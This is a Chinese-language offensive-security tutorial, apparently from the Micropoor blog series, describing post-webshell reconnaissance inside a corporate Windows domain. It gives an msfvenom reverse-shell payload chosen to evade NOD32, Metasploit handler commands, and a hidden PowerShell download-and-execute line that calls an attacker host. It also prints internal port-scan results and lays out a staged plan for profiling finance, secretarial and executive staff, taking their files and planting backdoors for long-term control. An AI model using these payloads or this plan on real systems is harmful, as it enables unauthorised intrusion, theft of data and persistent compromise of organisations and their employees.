第五十二課:滲透的本質是信息搜集
專注APT攻擊與防御
https://micropoor.blogspot.com/
目標資產信息搜集的程度,決定滲透過程的復雜程度。
目標主機信息搜集的深度,決定后滲透權限持續(xù)把控。
滲透的本質是信息搜集,而信息搜集整理為后續(xù)的情報跟進提供了強大的保證。
----Micropoor
文章將連載,從幾方面論證,滲透的本質是信息搜集。
一次完整的網絡滲透,不僅僅是與目標管理人員的權限爭奪,一次完整的網絡滲透,它分為兩大塊,技術業(yè)務與信息分析業(yè)務。
而技術業(yè)務要輔助并且要為信息分析業(yè)務提供強大的支撐與保證。同時信息分析業(yè)務要為技術業(yè)務提供關鍵的目標信息分析邏輯關系與滲透方向。
案例如下:(非root/administrator下主動信息搜集)(有馬賽克)在得到一個webshell時,非root/administrator情況下對目標信息搜集至關重要,它會影響
后期的滲透是否順利,以及滲透方向。
目標主機分配了2個內網IP,分別為10.0.0.X與192.168.100.X
得知部分服務軟件,以及殺毒軟件 NOD32,一般內網中為殺毒為集體一致。
搜集補丁更新頻率,以及系統(tǒng)狀況
搜集安裝軟件以及版本,路徑等。
域中用戶如下。目前權限為 iis apppoolxxxx
正如上面所說,技術業(yè)務需要輔助分析業(yè)務。在域組中,其中有幾個組需要特別關注,在一般的大型內網滲透中,需要關注大致幾個組
(1)IT組/研發(fā)組 他們掌握在大量的內網密碼,數據庫密碼等。
(2)秘書組 他們掌握著大量的目標機構的內部傳達文件,為信息分析業(yè)務提供信息,在反饋給技術業(yè)務來確定滲透方向
(3)domain admins組 root/administrator
(4)財務組 他們掌握著大量的資金往來與目標企業(yè)的規(guī)劃發(fā)展,并且可以通過資金,來判斷出目標組織的整體架構
(5)CXX組 ceo cto coo等,不同的目標組織名字不同,如部長,廠長,經理等。
以研發(fā)中心為例:研發(fā)中心共計4人。
并且開始規(guī)劃信息刺探等級:
等級1:確定某部門具體人員數量 如研發(fā)中心4人
等級2:確定該部門的英文用戶名的具體信息,如姓名,聯系方式,郵箱,職務等。以便確定下一步攻擊方向
等級3:分別刺探白天/夜間 內網中所存活機器并且對應IP地址
等級4:對應人員的工作機內網IP,以及工作時間
等級5:根據信息業(yè)務反饋,制定目標安全時間,以便拖拽指定人員文件,或登錄目標機器
等級6:制定目標機器后滲透與持續(xù)滲透的方式以及后門
刺探等級1
刺探等級2
在 net user /domain 后得到域中用戶,但需要在非root/administrator權限下得到更多的信息來給信息分析業(yè)務提供數據,并確定攻擊方向。
在案例中針對nod32,采用powershell payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx
LPORT=xx -f psh-reflection >xx.ps1
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost xxx.xxx.xxx.xxx
lhost => xxx.xxx.xxx.xxx
msf exploit(handler) > set lport xxx
lport => xxx
msf > run
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object
Net.WebClient).DownloadString('http://xxx.xxx.xxx.xxx/xxx.ps1');"
注意區(qū)分目標及系統(tǒng)是32位還是64位。
接下來將會用 IIS APPPOOLXXXX 的權限來搜集更多有趣的信息
某數據庫配置 for mssql
白天測試段10.0.0.x段在線主機 for windows (部分)
10.0.0.x 段信息刺探:
IP 1-50 open 3389 (部分)
[+] 10.0.0.2: - 10.0.0.2:3389 - TCP OPEN
[+] 10.0.0.3: - 10.0.0.3:3389 - TCP OPEN
[+] 10.0.0.5: - 10.0.0.5:3389 - TCP OPEN
[+] 10.0.0.7: - 10.0.0.7:3389 - TCP OPEN
[+] 10.0.0.9: - 10.0.0.9:3389 - TCP OPEN
[+] 10.0.0.12: - 10.0.0.12:3389 - TCP OPEN
[+] 10.0.0.13: - 10.0.0.13:3389 - TCP OPEN
[+] 10.0.0.14: - 10.0.0.14:3389 - TCP OPEN
[+] 10.0.0.26: - 10.0.0.26:3389 - TCP OPEN
[+] 10.0.0.28: - 10.0.0.28:3389 - TCP OPEN
[+] 10.0.0.32: - 10.0.0.32:3389 - TCP OPEN
IP 1-255 open 22,25 (部分)
[+] 10.0.0.3: - 10.0.0.3:25 - TCP OPEN
[+] 10.0.0.5: - 10.0.0.5:25 - TCP OPEN
[+] 10.0.0.14: - 10.0.0.14:25 - TCP OPEN
[+] 10.0.0.15: - 10.0.0.15:22 - TCP OPEN
[+] 10.0.0.16: - 10.0.0.16:22 - TCP OPEN
[+] 10.0.0.17: - 10.0.0.17:22 - TCP OPEN
[+] 10.0.0.20: - 10.0.0.20:22 - TCP OPEN
[+] 10.0.0.21: - 10.0.0.21:22 - TCP OPEN
[+] 10.0.0.31: - 10.0.0.31:22 - TCP OPEN
[+] 10.0.0.38: - 10.0.0.38:22 - TCP OPEN
[+] 10.0.0.40: - 10.0.0.40:22 - TCP OPEN
[+] 10.0.0.99: - 10.0.0.99:22 - TCP OPEN
[+] 10.0.0.251: - 10.0.0.251:22 - TCP OPEN
[+] 10.0.0.254: - 10.0.0.254:22 - TCP OPEN
IP 1-255 smtp for version (部分)
msf auxiliary(smtp_version) > run
[+] 10.0.0.3:25 - 10.0.0.3:25 SMTP 220 xxxxxxxxxxxxxxxxx MAIL Service,
Version: 7.5.7601.17514 ready at Wed, 14 Feb 2018 18:28:44 +0800 x0dx0a
[+] 10.0.0.5:25 - 10.0.0.5:25 SMTP 220 xxxxxxxxxxxxxxxxx Microsoft ESMTP
MAIL Service, Version: 7.5.7601.17514 ready at Wed, 14 Feb 2018 18:29:05 +0800x0dx0a
[+] 10.0.0.14:25 - 10.0.0.14:25 SMTP 220 xxxxxxxxxxxxxxxxxt ESMTP MAIL
Service, Version: 7.0.6002.18264 ready at Wed, 14 Feb 2018 18:30:32 +0800 x0dx0a
在iis apppoolxxxx的權限下,目前得知該目標內網分配段,安裝軟件,殺毒,端口,服務,補丁更新頻率,管理員上線操作時間段,數據庫配置信息,域用戶詳細信息(英文user對應的職務,姓名等),以上數據等待信息分析業(yè)務,來確定攻擊方向。如財務組,如cxx組等。并且完成了刺探等級1-4
而在以上的信息搜集過程中,提權不在是我考慮的問題了,可以Filezilla server 提權,mssqsl數據庫提權,win03 提權,win2000提權,win08提權,iis.x提權,內網映射提權等。而現在需要做的是如何反制被發(fā)現來制定目標業(yè)務后門,以便長期控制。
下一季的連載,將會從三方面來講述大型內網的信息刺探,既有0day的admin權限下刺探,無提權下的guest/users權限下刺探。數據庫下的權限刺探。域權限延伸到辦公PC機的信息刺探。以及只有路由權限下的信息刺探。原來在滲透過程中,提權是次要的,信息刺探才是滲透的本質。
Micropoor
?
